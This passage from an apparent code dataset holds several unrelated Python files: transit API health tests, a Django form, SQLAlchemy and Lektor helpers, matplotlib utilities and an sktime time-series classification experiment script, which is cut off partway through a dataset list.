content
stringlengths 5
1.05M
|
|---|
import time
from os import environ
from datetime import datetime
from models import Application, Request, Test, TestGroup
BASE_DEV_URL = environ["TRANSIT_DEV_BACKEND_URL"]
BASE_PROD_URL = environ["TRANSIT_BACKEND_URL"]
GTFS_EXPIRATION_BUFFER = 7 # number of days before GTFS feed expiration date
# We want to verify that /allstops returns a list of type 'busStop' only
def allstops_returns_bus_stops(r):
response = r.json()
# Make sure response was successful
if not response["success"]:
return False
# Iterate over stops
for stop in response["data"]:
# Check that the BusStop object is properly decoded
if "type" not in stop or stop["type"] != "busStop":
return False
return True
# There should always be at least one walking route displayed to the user
def at_least_one_walking_route(r):
response = r.json()
# Make sure response was successful
if not response["success"]:
return False
# Verify list of walking directions is not empty
walking_directions = response["data"]["walking"]
return walking_directions is not None or len(walking_directions) > 0
def check_gtfs_feed_expiration(r):
response = r.json()
# Make sure response was successful
if not response["success"]:
return False
end_date = datetime.strptime(response["data"]["feed_end_date"], "%Y%m%d")
today = datetime.today()
if today < end_date:
return (end_date - today).days > GTFS_EXPIRATION_BUFFER
return False
# We want to verify that route numbers are non-null, or that they will not show up as
# -1 inside of the application.
def route_number_non_null_callback(r):
response = r.json()
# Make sure response was successful
if not response["success"]:
return False
# Iterate over directions
for route_directions in response["data"]["boardingSoon"]:
for direction in route_directions["directions"]:
# Walking directions can have a [None] routeNumber
if direction["type"] != "walk" and direction["routeNumber"] is None:
return False
return True
# The 'Boarding Soon' section should not contain any walking routes, as they should
# be explicitly within the 'Walking' section.
def no_walking_routes_in_boarding_soon(r):
response = r.json()
# Make sure response was successful
if not response["success"]:
return False
# Iterate over directions
for route_directions in response["data"]["boardingSoon"]:
if route_directions["numberOfTransfers"] == -1:
return False
return True
# We want to ensure that given a query string, /search does not result in an error,
# namely "Cannot read property 'filter' of null," and instead returns a list of
# valid suggestions - autocomplete results that are either of type 'applePlace' or 'busStop'.
def search_returns_suggestions(r):
response = r.json()
# Make sure response was successful
if not response["success"]:
print("not successful")
return False
# Iterate over two types of search suggestions
for suggestion in response["data"]:
if suggestion not in ["applePlaces", "busStops"]:
return False
for busStop in suggestion["busStops"]:
if not busStop.get("type") == "busStop":
return False
for applePlace in suggestion["applePlaces"]:
if not applePlace.get("type") == "applePlace":
return False
return True
def generate_tests(base_url):
return [
Test(
name="Live Tracking 200",
request=Request(
method="GET",
# TODO: Change in future, currently 5000 can only be accessed over http
url=base_url[:-1].replace("https", "http") + ":5000",
),
),
Test(name="api/docs 200", request=Request(method="GET", url=base_url + "api/docs/")),
Test(name="api/v1/allstops 200", request=Request(method="GET", url=base_url + "api/v1/allstops/")),
Test(
name="api/v2/route 200",
request=Request(
method="POST",
url=base_url + "api/v2/route/",
payload={
"arriveBy": False,
"end": "42.454197,-76.440651",
"start": "42.449086,-76.483306",
"destinationName": 933,
"time": time.time(),
},
),
),
Test(
name="api/v2/route does not contain -1",
request=Request(
method="POST",
url=base_url + "api/v2/route/",
payload={
"arriveBy": False,
"end": "42.454197,-76.440651",
"start": "42.449086,-76.483306",
"destinationName": 933,
"time": time.time(),
},
),
callback=route_number_non_null_callback,
),
Test(
name="No walking routes in boardingSoon (/api/v2/route)",
request=Request(
method="POST",
url=base_url + "api/v2/route/",
payload={
"arriveBy": False,
"end": "42.445228,-76.485053", # Uris Library
"start": "42.440847,-76.483741", # Collegetown
"destinationName": 933,
"time": time.time(),
},
),
callback=no_walking_routes_in_boarding_soon,
),
Test(
name="api/v2/appleSearch contains applePlaces and busStops",
request=Request(method="POST", url=base_url + "api/v2/appleSearch", payload={"query": "st"}),
callback=search_returns_suggestions,
),
Test(
name="api/v1/allstops only contains busStops",
request=Request(method="GET", url=base_url + "api/v1/allstops/"),
callback=allstops_returns_bus_stops,
),
Test(
name="At least one walking route shown (/api/v2/route)",
request=Request(
method="POST",
url=base_url + "api/v2/route/",
payload={
"arriveBy": False,
"end": "42.445228,-76.485053", # Uris Library
"start": "42.440847,-76.483741", # Collegetown
"destinationName": 933,
"time": time.time(),
},
),
callback=at_least_one_walking_route,
),
]
transit_dev_tests = TestGroup(application=Application.TRANSIT, name="Transit Dev", tests=generate_tests(BASE_DEV_URL))
transit_prod_tests = TestGroup(
application=Application.TRANSIT, name="Transit Prod", tests=generate_tests(BASE_PROD_URL)
)
|
# -*- coding: utf-8 -*-
# main converter file, converts datasheet to Lektor format
import glob
import os
import json
import re
import htmlparser
import referenceparser
import symbolreplace
def convert(datasheet, url_context):
data = {}
# metadata, the template and model
data['_model'] = 'glossary'
data['_template'] = 'glossary.html'
# easily translatable info
data['term'] = symbolreplace.strip_tags(symbolreplace.tags_to_unicode(datasheet['WORD']))
# parse biography, and add in extras and translations
data['content'] = htmlparser.parse(datasheet['CONTENTS'],
datasheet['FILENAME'],
paragraphs=True,
url_context=url_context)
return data
|
from .image import Image, ImageWindow
from .image_bmp import ImageBmp
|
from django import forms
from .models import Transportadora, FormaPagamento
class FinalizarPedido(forms.Form):
"""
Formulário para receber qual opção de transportadora e forma de pagamento o usuário deseja
Attribute transportadora: Recebe a opção de transportadora que o usuário escolher
Attribute forma_pagamento: Recebe a opção de forma de pagamento que o usuário escolher
"""
transportadora = forms.ChoiceField(choices=[], widget=forms.RadioSelect)
forma_pagamento = forms.ChoiceField(choices=[], widget=forms.RadioSelect)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['transportadora'].choices = Transportadora.receber()
self.fields['forma_pagamento'].choices = FormaPagamento.receber()
|
# Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from makani.gs.monitor2.apps.layout import autogen
from makani.gs.monitor2.apps.layout import base
from makani.gs.monitor2.apps.layout import layout_util
from makani.gs.monitor2.apps.receiver import test_util
from makani.lib.python import struct_tree
class TestPlotData(unittest.TestCase):
def testPlotData(self):
template = base.PlotData(None)
self.assertEqual(template.apple, 'apple')
self.assertEqual(template.banana, 'banana')
data = base.PlotData(template)
data.apple = 'red'
banana_status = {
'yellow': 'good',
'black': 'bad',
}
data.banana = banana_status
self.assertEqual(data.Json(), {
'apple': 'red',
'banana': banana_status,
})
with self.assertRaises(base.MonitorLayoutException):
data.orange = 1
def testGetDistinguishableNames(self):
self.assertEqual(
layout_util.GetDistinguishableNames(['Day.NewYork.BigApple',
'Night.NewYork.BigMelon'],
'.', ['Big']),
{'Day.NewYork.BigApple': 'Day.Apple',
'Night.NewYork.BigMelon': 'Night.Melon'})
self.assertEqual(
layout_util.GetDistinguishableNames(['Day.NewYork',
'Day.NewYork.BigMelon'],
'.', ['Big']),
{'Day.NewYork': 'NewYork',
'Day.NewYork.BigMelon': 'NewYork.Melon'})
class TestAutogen(unittest.TestCase):
def testBasics(self):
messages = struct_tree.StructTree({
'MotorStatus': {
'MotorPbi': {
'status': 0,
'errors': [1, 2, 3],
'details': {'temp': 60, 'voltage': 800},
}
}
}, fail_silently=False, readonly=True)
scenario = autogen.GenerateScenario(messages.Data(), 'Test')
self.assertEqual(scenario, {
'signals': {},
'canvas': {
'row_height_px': 40,
'grid_width': 12
},
'views': [
{
'stripe': [
{
'indicators': [
{
'src': 'MotorStatus.MotorPbi.details.temp',
'name': 'details.temp',
'cols': 12,
'precision': None,
'indicator_src': None,
'template': 'ScalarIndicator',
'font_size': None,
'mode': 'horizontal'
},
{
'src': 'MotorStatus.MotorPbi.details.voltage',
'name': 'details.voltage',
'cols': 12,
'precision': None,
'indicator_src': None,
'template': 'ScalarIndicator',
'font_size': None,
'mode': 'horizontal'
},
{
'message_src': None,
'src': 'MotorStatus.MotorPbi.errors',
'mode': 'horizontal',
'template': 'ListIndicator',
'indicator_src': None,
'keys': [
'[0]',
'[1]',
'[2]'
],
'precision': None,
'cols': 12,
'font_size': None,
'name': 'errors'
},
{
'src': 'MotorStatus.MotorPbi.status',
'name': 'status',
'cols': 12,
'precision': None,
'indicator_src': None,
'template': 'ScalarIndicator',
'font_size': None,
'mode': 'horizontal'
}
],
'rows': 3,
'name': 'MotorStatus.MotorPbi',
'grid_width': 12
}
],
'grid_width': 12
}
],
'filters': [],
'title': 'Test'
})
def testCtypes(self):
messages = test_util.SynthesizeMessages(['ControlTelemetry'], 0)
# Run and make sure there are no faults.
autogen.GenerateScenario(messages.Data(convert_to_basic_types=True), 'Test')
if __name__ == '__main__':
unittest.main()
|
import sqlalchemy as sa
from .db_session import SqlAlchemyBase
class Forum(SqlAlchemyBase):
__tablename__ = 'forums'
__table_args__ = {'extend_existing': True}
id = sa.Column(sa.Integer,
primary_key=True, autoincrement=True)
name = sa.Column(sa.String, nullable=True)
title = sa.Column(sa.String, nullable=True)
lesson = sa.Column(sa.String, nullable=True)
quest = sa.Column(sa.String, nullable=True)
results = sa.Column(sa.String, nullable=True)
user = sa.Column(sa.String, nullable=True)
|
'''
Harvester for the ASU Digital Repository for the SHARE project
Example API call: https://zenodo.org/oai2d?verb=ListRecords&metadataPrefix=oai_dc
'''
from __future__ import unicode_literals
from scrapi.base import OAIHarvester
class ZenodoHarvester(OAIHarvester):
short_name = 'zenodo'
long_name = 'Zenodo'
url = 'https://zenodo.org/oai2d'
base_url = 'https://zenodo.org/oai2d'
property_list = ['language', 'rights', 'source', 'relation', 'date', 'identifier', 'type']
timezone_granularity = True
|
import scipy.interpolate as interpolate
import matplotlib
import matplotlib.image as image
from matplotlib import rc, rcParams
import numpy as np
def get_ax_size(fig, ax):
'''
Returns the size of a given axis in pixels
Args:
fig (matplotlib figure)
ax (matplotlib axes)
'''
bbox = ax.get_window_extent().transformed(fig.dpi_scale_trans.inverted())
width, height = bbox.width, bbox.height
width *= fig.dpi
height *= fig.dpi
return width, height
def place_image(fig, ax, image_name, xsize, xpos, ypos, zorder=10):
'''
Places an image on a given axes whilst maintaining its aspect ratio
Args:
fig (matplotlib figure)
ax (matplotlib axes)
image_name (string): name of image to place on axes
xsize(float): size of the x-dimension of object given as fraction of the axes length
xpos(float): x-coordinate of image given as fraction of axes
ypos(float): y-coordinate of image given as fraction of axes
'''
im = image.imread(image_name)
xrange=ax.get_xlim()[1]-ax.get_xlim()[0]
yrange=ax.get_ylim()[1]-ax.get_ylim()[0]
ysize=(im.shape[0]/im.shape[1])*(xsize*get_ax_size(fig,ax)[0])/get_ax_size(fig,ax)[1]
xsize *= xrange
ysize *= yrange
xpos = (xpos*xrange) + ax.get_xlim()[0]
ypos = (ypos*yrange) + ax.get_ylim()[0]
ax.imshow(im,aspect='auto',extent=(xpos,xpos+xsize,ypos,ypos+ysize),interpolation='none', zorder=zorder )
def interpolate_df(df,xrange,dx):
'''
Interpolates data in a panda dataframe
Args:
df(panda dataframe): dataframe containing data to be interpolated
xrange(int): number of data points
dx(float): interval for interpolated data outputted
Returns:
numpy array contating interpolated x,y data'''
points=np.array( [(x[0],value) for x,value in np.ndenumerate(df.values)])
x=points[:,0]
y=points[:,1]
spline = interpolate.splrep(points[:,0],y=points[:,1],s=0)
xnew = np.arange(xrange[0],xrange[1],dx)
ynew = interpolate.splev(xnew,spline,der=0)
xnew=x # remove these lines to get spline
ynew=y # not linear
return xnew,ynew
def get_y_limits(size,zero_point):
'''
Interpolates data in a panda dataframe
Args:
df(panda dataframe): dataframe containing data to be interpolated
xrange(int): number of data points
dx(float): interval for interpolated data outputted
Returns:
numpy array contating interpolated x,y data'''
y_top= size*(1.0-zero_point)
y_bottom= -size*(zero_point)
return y_bottom,y_top
def get_df_range(df,key):
'''
Filters a panda dataframe by key and returns its range
Args:
df(panda dataframe): dataframe containing data to be interpolated
key(string): key of data to filter
Returns:
range of data (float)'''
Channels = df.filter(regex=key)
return Channels.values.max()-Channels.values.min()
def get_df_max(df,key):
'''
Filters a panda dataframe by key and returns its max value
Args:
df(panda dataframe): dataframe containing data to be interpolated
key(string): key of data to filter
Returns:
max of data (float)'''
Channels = df.filter(regex=key)
return Channels.values.max()
def get_df_min(df,key):
'''
Filters a panda dataframe by key and returns its min
Args:
df(panda dataframe): dataframe containing data to be interpolated
key(string): key of data to filter
Returns:
min of data (float)'''
Channels = df.filter(regex=key)
return Channels.values.min()
def get_y_range(df,key,dec_f,pad):
'''
Get a suitable range for the y-axis to hold data in a panda dataframe
Args:
df(panda dataframe): dataframe containing data to be interpolated
key(string): key of data to filter
dec_f(integer): number of digits to round to
pad(float): padding either side
Returns:
suitable range of for y-data (float)'''
return round(get_df_range(df,key),dec_f)+2.0*pad
def get_y_axis_limits(df,key,zero_point,dec_f,pad):
'''
Set y-limits to hold a panda dataframe given a zero-point
Args:
df(panda dataframe): dataframe containing data to be interpolated
key(string): key of data to filter
zero_point(float): where to zero on y-axis
dec_f(integer): number of digits to round to
pad(float): padding either side
Returns:
y-limits for matplotlib axes (float)'''
yrange=get_y_range(df,key,dec_f,pad)
ymax=get_df_max(df,key)
ymin=get_df_min(df,key)
urange = max(ymax,(1.0-zero_point)*yrange)
lrange = min(ymin,-(zero_point*yrange))
total_range = round(max(urange/(1-zero_point),(-lrange/zero_point)),1)+(2*pad)
return get_y_limits(total_range,zero_point)
def line(x, m, c):
return m * x + c
# Global formatting options
matplotlib.style.use('ggplot')
nearly_black = '#161616'
light_grey = '#EEEEEE'
lighter_grey = '#F5F5F5'
colours = { 'U': '#62606f',
'LM': '#f46d43',
'LT': '#f2c23e' }
symbol = { 0.25: 'co',
0.50: 'v' }
fontsize=16
master_formatting = { 'axes.formatter.limits': (-3,3),
'xtick.major.pad': 7,
'ytick.major.pad': 7,
'ytick.color': nearly_black,
'xtick.color': nearly_black,
'axes.labelcolor': nearly_black,
'legend.facecolor': light_grey,
'pdf.fonttype': 42,
'ps.fonttype': 42,
'mathtext.fontset': 'custom',
'font.size': fontsize,
'font.family': 'serif',
'mathtext.rm': 'Minion Pro',
'mathtext.it': 'Minion Pro:italic',
'mathtext.bf': 'Minion Pro:bold',
'savefig.bbox':'tight',
'axes.facecolor': lighter_grey,
'axes.labelpad': 10.0,
'axes.labelsize': fontsize,
'axes.titlepad': 25,
'axes.spines.top': False,
'axes.spines.left': False,
'axes.spines.right': False,
'axes.spines.bottom': False,
'lines.markersize': 5.0,
'lines.markeredgewidth': 0.0,
'lines.linewidth': 1.5,
'lines.scale_dashes': False }
def set_rcParams( formatting ):
for k, v in formatting.items():
rcParams[k] = v
|
# -*- coding: utf-8 -*-
"""Experiments: code to run experiments as an alternative to orchestration.
This file is configured for runs of the main method with command line arguments, or for
single debugging runs. Results are written in a standard format
todo: Tidy up this file!
"""
import os
import sklearn.preprocessing
import sklearn.utils
from sktime.classification.dictionary_based import (
BOSSEnsemble,
ContractableBOSS,
TemporalDictionaryEnsemble,
WEASEL,
MUSE,
)
from sktime.classification.distance_based import (
ElasticEnsemble,
ProximityForest,
ProximityTree,
ProximityStump,
KNeighborsTimeSeriesClassifier,
ShapeDTW,
)
from sktime.classification.hybrid import HIVECOTEV1
from sktime.classification.hybrid._catch22_forest_classifier import (
Catch22ForestClassifier,
)
from sktime.classification.interval_based import (
TimeSeriesForestClassifier,
RandomIntervalSpectralForest,
)
from sktime.classification.interval_based._cif import CanonicalIntervalForest
from sktime.classification.interval_based._drcif import DrCIF
from sktime.classification.kernel_based import ROCKETClassifier, Arsenal
from sktime.classification.shapelet_based import MrSEQLClassifier
from sktime.classification.shapelet_based import ShapeletTransformClassifier
os.environ["MKL_NUM_THREADS"] = "1" # must be done before numpy import!!
os.environ["NUMEXPR_NUM_THREADS"] = "1" # must be done before numpy import!!
os.environ["OMP_NUM_THREADS"] = "1" # must be done before numpy import!!
import sys
import time
import numpy as np
import pandas as pd
from sklearn import preprocessing
from sklearn.metrics import accuracy_score
from sklearn.model_selection import cross_val_predict
from sktime.utils.data_io import load_from_tsfile_to_dataframe as load_ts
import sktime.datasets.tsc_dataset_names as dataset_lists
__author__ = ["Tony Bagnall"]
"""Prototype mechanism for testing classifiers on the UCR format. This mirrors the
mechanism used in Java,
https://github.com/TonyBagnall/uea-tsc/tree/master/src/main/java/experiments
but is not yet as engineered. However, if you generate results using the method
recommended here, they can be directly and automatically compared to the results
generated in java
"""
classifier_list = [
# Distance based
"ProximityForest",
"KNeighborsTimeSeriesClassifier",
"ElasticEnsemble",
"ShapeDTW",
# Dictionary based
"BOSS",
"ContractableBOSS",
"TemporalDictionaryEnsemble",
"WEASEL",
"MUSE",
# Interval based
"RandomIntervalSpectralForest",
"TimeSeriesForestClassifier",
"CanonicalIntervalForest",
# Shapelet based
"ShapeletTransformClassifier",
"MrSEQLClassifier",
# Kernel based
"ROCKET",
"Arsenal",
]
def set_classifier(cls, resampleId=None):
"""Construct a classifier.
Basic way of creating the classifier to build using the default settings. This
set up is to help with batch jobs for multiple problems to facilitate easy
reproducability. You can set up bespoke classifier in many other ways.
Parameters
----------
cls: String indicating which classifier you want
resampleId: classifier random seed
Return
------
A classifier.
"""
name = cls.lower()
# Distance based
if name == "pf" or name == "proximityforest":
return ProximityForest(random_state=resampleId)
elif name == "pt" or name == "proximitytree":
return ProximityTree(random_state=resampleId)
elif name == "ps" or name == "proximityStump":
return ProximityStump(random_state=resampleId)
elif name == "dtwcv" or name == "kneighborstimeseriesclassifier":
return KNeighborsTimeSeriesClassifier(distance="dtwcv")
elif name == "dtw" or name == "1nn-dtw":
return KNeighborsTimeSeriesClassifier(distance="dtw")
elif name == "msm" or name == "1nn-msm":
return KNeighborsTimeSeriesClassifier(distance="msm")
elif name == "ee" or name == "elasticensemble":
return ElasticEnsemble()
elif name == "shapedtw":
return ShapeDTW()
# Dictionary based
elif name == "boss" or name == "bossensemble":
return BOSSEnsemble(random_state=resampleId)
elif name == "cboss" or name == "contractableboss":
return ContractableBOSS(random_state=resampleId)
elif name == "tde" or name == "temporaldictionaryensemble":
return TemporalDictionaryEnsemble(random_state=resampleId)
elif name == "weasel":
return WEASEL(random_state=resampleId)
elif name == "muse":
return MUSE(random_state=resampleId)
# Interval based
elif name == "rise" or name == "randomintervalspectralforest":
return RandomIntervalSpectralForest(random_state=resampleId)
elif name == "tsf" or name == "timeseriesforestclassifier":
return TimeSeriesForestClassifier(random_state=resampleId)
elif name == "cif" or name == "canonicalintervalforest":
return CanonicalIntervalForest(random_state=resampleId)
elif name == "drcif":
return DrCIF(random_state=resampleId)
# Shapelet based
elif name == "stc" or name == "shapelettransformclassifier":
return ShapeletTransformClassifier(
random_state=resampleId, transform_contract_in_mins=60
)
elif name == "mrseql" or name == "mrseqlclassifier":
return MrSEQLClassifier(seql_mode="fs", symrep=["sax", "sfa"])
elif name == "rocket":
return ROCKETClassifier(random_state=resampleId)
elif name == "arsenal":
return Arsenal(random_state=resampleId)
# Hybrid
elif name == "catch22":
return Catch22ForestClassifier(random_state=resampleId)
elif name == "hivecotev1":
return HIVECOTEV1(random_state=resampleId)
else:
raise Exception("UNKNOWN CLASSIFIER")
def stratified_resample(X_train, y_train, X_test, y_test, random_state):
"""Resample data using a random state.
Reproducable resampling. Combines train and test, resamples to get the same class
distribution, then returns new trrain and test.
Parameters
----------
X_train: train data attributes in sktime pandas format.
y_train: train data class labes as np array.
X_test: test data attributes in sktime pandas format.
y_test: test data class labes as np array.
Returns
-------
new train and test attributes and class labels.
"""
all_labels = np.concatenate((y_train, y_test), axis=None)
all_data = pd.concat([X_train, X_test])
random_state = sklearn.utils.check_random_state(random_state)
# count class occurrences
unique_train, counts_train = np.unique(y_train, return_counts=True)
unique_test, counts_test = np.unique(y_test, return_counts=True)
assert list(unique_train) == list(
unique_test
) # haven't built functionality to deal with classes that exist in
# test but not in train
# prepare outputs
X_train = pd.DataFrame()
y_train = np.array([])
X_test = pd.DataFrame()
y_test = np.array([])
# for each class
for label_index in range(0, len(unique_train)):
# derive how many instances of this class from the counts
num_instances = counts_train[label_index]
# get the indices of all instances with this class label
label = unique_train[label_index]
indices = np.where(all_labels == label)[0]
# shuffle them
random_state.shuffle(indices)
# take the first lot of instances for train, remainder for test
train_indices = indices[0:num_instances]
test_indices = indices[num_instances:]
del indices # just to make sure it's not used!
# extract data from corresponding indices
train_instances = all_data.iloc[train_indices, :]
test_instances = all_data.iloc[test_indices, :]
train_labels = all_labels[train_indices]
test_labels = all_labels[test_indices]
# concat onto current data from previous loop iterations
X_train = pd.concat([X_train, train_instances])
X_test = pd.concat([X_test, test_instances])
y_train = np.concatenate([y_train, train_labels], axis=None)
y_test = np.concatenate([y_test, test_labels], axis=None)
# get the counts of the new train and test resample
unique_train_new, counts_train_new = np.unique(y_train, return_counts=True)
unique_test_new, counts_test_new = np.unique(y_test, return_counts=True)
# make sure they match the original distribution of data
assert list(counts_train_new) == list(counts_train)
assert list(counts_test_new) == list(counts_test)
return X_train, y_train, X_test, y_test
def run_experiment(
problem_path,
results_path,
cls_name,
dataset,
classifier=None,
resampleID=0,
overwrite=False,
format=".ts",
train_file=False,
):
"""Run a classification experiment.
Method to run a basic experiment and write the results to files called
testFold<resampleID>.csv and, if required, trainFold<resampleID>.csv.
Parameters
----------
problem_path: Location of problem files, full path.
results_path: Location of where to write results. Any required directories
will be created
cls_name: determines which classifier to use, as defined in set_classifier.
This assumes predict_proba is
implemented, to avoid predicting twice. May break some classifiers though
dataset: Name of problem. Files must be <problem_path>/<dataset>/<dataset>+
"_TRAIN"+format, same for "_TEST"
resampleID: Seed for resampling. If set to 0, the default train/test split
from file is used. Also used in output file name.
overwrite: if set to False, this will only build results if there is not a
result file already present. If
True, it will overwrite anything already there
format: Valid formats are ".ts", ".arff" and ".long".
For more info on format, see examples/Loading%20Data%20Examples.ipynb
train_file: whether to generate train files or not. If true, it performs a
10xCV on the train and saves
"""
build_test = True
if not overwrite:
full_path = (
str(results_path)
+ "/"
+ str(cls_name)
+ "/Predictions/"
+ str(dataset)
+ "/testFold"
+ str(resampleID)
+ ".csv"
)
if os.path.exists(full_path):
print(
full_path
+ " Already exists and overwrite set to false, not building Test"
)
build_test = False
if train_file:
full_path = (
str(results_path)
+ "/"
+ str(cls_name)
+ "/Predictions/"
+ str(dataset)
+ "/trainFold"
+ str(resampleID)
+ ".csv"
)
if os.path.exists(full_path):
print(
full_path
+ " Already exists and overwrite set to false, not building Train"
)
train_file = False
if train_file == False and build_test == False:
return
# TO DO: Automatically differentiate between problem types,
# currently only works with .ts
trainX, trainY = load_ts(problem_path + dataset + "/" + dataset + "_TRAIN" + format)
testX, testY = load_ts(problem_path + dataset + "/" + dataset + "_TEST" + format)
if resampleID != 0:
# allLabels = np.concatenate((trainY, testY), axis = None)
# allData = pd.concat([trainX, testX])
# train_size = len(trainY) / (len(trainY) + len(testY))
# trainX, testX, trainY, testY = train_test_split(allData, allLabels,
# train_size=train_size,
# random_state=resampleID, shuffle=True,
# stratify=allLabels)
trainX, trainY, testX, testY = stratified_resample(
trainX, trainY, testX, testY, resampleID
)
le = preprocessing.LabelEncoder()
le.fit(trainY)
trainY = le.transform(trainY)
testY = le.transform(testY)
if classifier is None:
classifier = set_classifier(cls_name, resampleID)
print(cls_name + " on " + dataset + " resample number " + str(resampleID))
if build_test:
# TO DO : use sklearn CV
start = int(round(time.time() * 1000))
classifier.fit(trainX, trainY)
build_time = int(round(time.time() * 1000)) - start
start = int(round(time.time() * 1000))
probs = classifier.predict_proba(testX)
preds = classifier.classes_[np.argmax(probs, axis=1)]
test_time = int(round(time.time() * 1000)) - start
ac = accuracy_score(testY, preds)
print(
cls_name
+ " on "
+ dataset
+ " resample number "
+ str(resampleID)
+ " test acc: "
+ str(ac)
+ " time: "
+ str(test_time)
)
# print(str(classifier.findEnsembleTrainAcc(trainX, trainY)))
if "Composite" in cls_name:
second = "Para info too long!"
else:
second = str(classifier.get_params())
second.replace("\n", " ")
second.replace("\r", " ")
print(second)
temp = np.array_repr(classifier.classes_).replace("\n", "")
third = (
str(ac)
+ ","
+ str(build_time)
+ ","
+ str(test_time)
+ ",-1,-1,"
+ str(len(classifier.classes_))
)
write_results_to_uea_format(
second_line=second,
third_line=third,
output_path=results_path,
classifier_name=cls_name,
resample_seed=resampleID,
predicted_class_vals=preds,
actual_probas=probs,
dataset_name=dataset,
actual_class_vals=testY,
split="TEST",
)
if train_file:
start = int(round(time.time() * 1000))
if build_test and hasattr(
classifier, "_get_train_probs"
): # Normally Can only do this if test has been built
train_probs = classifier._get_train_probs(trainX)
else:
train_probs = cross_val_predict(
classifier, X=trainX, y=trainY, cv=10, method="predict_proba"
)
train_time = int(round(time.time() * 1000)) - start
train_preds = classifier.classes_[np.argmax(train_probs, axis=1)]
train_acc = accuracy_score(trainY, train_preds)
print(
cls_name
+ " on "
+ dataset
+ " resample number "
+ str(resampleID)
+ " train acc: "
+ str(train_acc)
+ " time: "
+ str(train_time)
)
if "Composite" in cls_name:
second = "Para info too long!"
else:
second = str(classifier.get_params())
second.replace("\n", " ")
second.replace("\r", " ")
temp = np.array_repr(classifier.classes_).replace("\n", "")
third = (
str(train_acc)
+ ","
+ str(train_time)
+ ",-1,-1,-1,"
+ str(len(classifier.classes_))
)
write_results_to_uea_format(
second_line=second,
third_line=third,
output_path=results_path,
classifier_name=cls_name,
resample_seed=resampleID,
predicted_class_vals=train_preds,
actual_probas=train_probs,
dataset_name=dataset,
actual_class_vals=trainY,
split="TRAIN",
)
def write_results_to_uea_format(
output_path,
classifier_name,
dataset_name,
actual_class_vals,
predicted_class_vals,
split="TEST",
resample_seed=0,
actual_probas=None,
second_line="No Parameter Info",
third_line="N/A",
class_labels=None,
):
"""Write results to file.
Outputs the classifier results, mirrors that produced by tsml Java package.
Directories of the form
<output_path>/<classifier_name>/Predictions/<dataset_name>
Will automatically be created and results written.
Parameters
----------
output_path: string, root path where to put results.
classifier_name: string, name of the classifier that made the predictions
dataset_name: string, name of the problem the classifier was built on
actual_class_vals: array, actual class labels
predicted_class_vals: array, predicted class labels
split: string, wither TRAIN or TEST, depending on the results.
resample_seed: int, makes resampling deterministic
actual_probas: number of cases x number of classes 2d array
second_line: unstructured, classifier parameters
third_line: summary performance information (see comment below)
class_labels: needed to equate to tsml output
"""
if len(actual_class_vals) != len(predicted_class_vals):
raise IndexError(
"The number of predicted class values is not the same as the "
+ "number of actual class values"
)
try:
os.makedirs(
str(output_path)
+ "/"
+ str(classifier_name)
+ "/Predictions/"
+ str(dataset_name)
+ "/"
)
except os.error:
pass # raises os.error if path already exists
if split == "TRAIN" or split == "train":
train_or_test = "train"
elif split == "TEST" or split == "test":
train_or_test = "test"
else:
raise ValueError("Unknown 'split' value - should be TRAIN/train or TEST/test")
file = open(
str(output_path)
+ "/"
+ str(classifier_name)
+ "/Predictions/"
+ str(dataset_name)
+ "/"
+ str(train_or_test)
+ "Fold"
+ str(resample_seed)
+ ".csv",
"w",
)
# <classifierName>,<datasetName>,<train/test>,<Class Labels>
file.write(
str(dataset_name)
+ ","
+ str(classifier_name)
+ ","
+ str(train_or_test)
+ ","
+ str(resample_seed)
+ ",MILLISECONDS,PREDICTIONS, Generated by classification_experiments.py"
)
file.write("\n")
# the second line of the output is free form and classifier-specific;
# usually this will record info
# such as parameter options used, any constituent model names for ensembles, etc.
file.write(str(second_line) + "\n")
# the third line of the file is the accuracy (should be between 0 and 1 inclusive).
# If this is a train output file then it will be a training estimate of the
# classifier on the training data only (e.g. #10-fold cv, leave-one-out cv, etc.).
# If this is a test output file, it should be the output of the estimator on the
# test data (likely trained on the training data for a-priori para optimisation)
file.write(str(third_line))
file.write("\n")
# from line 4 onwards each line should include the actual and predicted class labels
# (comma-separated). If present, for each case, the probabilities of predicting
# every class value for this case should also be appended to the line (a space is
# also included between the predicted value and the predict_proba). E.g.:
# if predict_proba data IS provided for case i:
# actual_class_val[i], predicted_class_val[i],,
#
# if predict_proba data IS NOT provided for case i:
# actual_class_val[i], predicted_class_val[i]
for i in range(0, len(predicted_class_vals)):
file.write(str(actual_class_vals[i]) + "," + str(predicted_class_vals[i]))
if actual_probas is not None:
file.write(",")
for j in actual_probas[i]:
file.write("," + str(j))
file.write("\n")
file.close()
def test_loading():
"""Test function to check dataset loading of univariate and multivaria problems."""
for i in range(0, len(dataset_lists.univariate)):
data_dir = "E:/tsc_ts/"
dataset = dataset_lists.univariate[i]
trainX, trainY = load_ts(data_dir + dataset + "/" + dataset + "_TRAIN.ts")
testX, testY = load_ts(data_dir + dataset + "/" + dataset + "_TEST.ts")
print("Loaded " + dataset + " in position " + str(i))
print("Train X shape :")
print(trainX.shape)
print("Train Y shape :")
print(trainY.shape)
print("Test X shape :")
print(testX.shape)
print("Test Y shape :")
print(testY.shape)
for i in range(16, len(dataset_lists.multivariate)):
data_dir = "E:/mtsc_ts/"
dataset = dataset_lists.multivariate[i]
print("Loading " + dataset + " in position " + str(i) + ".......")
trainX, trainY = load_ts(data_dir + dataset + "/" + dataset + "_TRAIN.ts")
testX, testY = load_ts(data_dir + dataset + "/" + dataset + "_TEST.ts")
print("Loaded " + dataset)
print("Train X shape :")
print(trainX.shape)
print("Train Y shape :")
print(trainY.shape)
print("Test X shape :")
print(testX.shape)
print("Test Y shape :")
print(testY.shape)
benchmark_datasets = [
"ACSF1",
"Adiac",
"ArrowHead",
"Beef",
"BeetleFly",
"BirdChicken",
"BME",
"Car",
"CBF",
"ChlorineConcentration",
"CinCECGTorso",
"Coffee",
"Computers",
"CricketX",
"CricketY",
"CricketZ",
"DiatomSizeReduction",
"DistalPhalanxOutlineCorrect",
"DistalPhalanxOutlineAgeGroup",
"DistalPhalanxTW",
"Earthquakes",
"ECG200",
"ECG5000",
"ECGFiveDays",
"EOGHorizontalSignal",
"EOGVerticalSignal",
